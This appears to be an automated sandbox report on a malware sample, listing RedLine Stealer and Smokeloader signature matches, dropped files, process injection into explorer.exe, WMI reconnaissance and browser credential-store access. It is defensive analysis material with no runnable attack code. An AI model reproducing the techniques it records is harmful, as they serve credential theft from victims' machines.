Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: 38E5.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uievsid.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/14@7/4

Source: C:\Users\user\Desktop\veEGy9FijY.exe

Code function: 0_2_0277FE01 CreateToolhelp32Snapshot,Module32First,

0_2_0277FE01

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Code function: 10_2_00007FF6AAB47138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,

10_2_00007FF6AAB47138

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\haevsid

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\38E5.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: s6.s	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: aYX	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: VD[E	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: =KnH	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: &mm	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: R`	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: F:	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: 0.txt	7_2_00431540
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Command line argument: poC	7_2_00436EC0
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: s6.s	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: aYX	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: VD[E	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: =KnH	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: &mm	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: R`	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: F:	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: 0.txt	9_2_00431540
Source: C:\Users\user\AppData\Roaming\uievsid	Command line argument: poC	9_2_00436EC0

Source: veEGy9FijY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="988"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="988"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="364"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="364"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="696"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="696"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="592"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="592"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1044"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1044"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1084"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1084"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1176"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1176"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1200"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1200"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1252"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1252"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1296"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1296"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1316"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1316"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1476"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1476"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1488"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1488"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1552"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1572"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1572"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1724"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1724"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1824"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1824"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1840"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1840"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1940"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1940"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1948"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1948"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1956"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1956"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2036"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2036"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1932"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1932"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2064"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2064"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2216"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2216"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\veEGy9FijY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: WMIC.exe, 0000001B.00000003.3192985137.000001A4FD3A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.3196606356.000001A4FD3B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.3193165799.000001A4FD3B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT Name, Location, Command FROM Win32_StartupCommand;
Source: 9E1F.tmp.13.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: veEGy9FijY.exe	ReversingLabs: Detection: 34%
Source: veEGy9FijY.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\veEGy9FijY.exe "C:\Users\user\Desktop\veEGy9FijY.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\haevsid C:\Users\user\AppData\Roaming\haevsid
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\38E5.exe C:\Users\user\AppData\Local\Temp\38E5.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uievsid C:\Users\user\AppData\Roaming\uievsid
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\BC8F.exe C:\Users\user\AppData\Local\Temp\BC8F.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
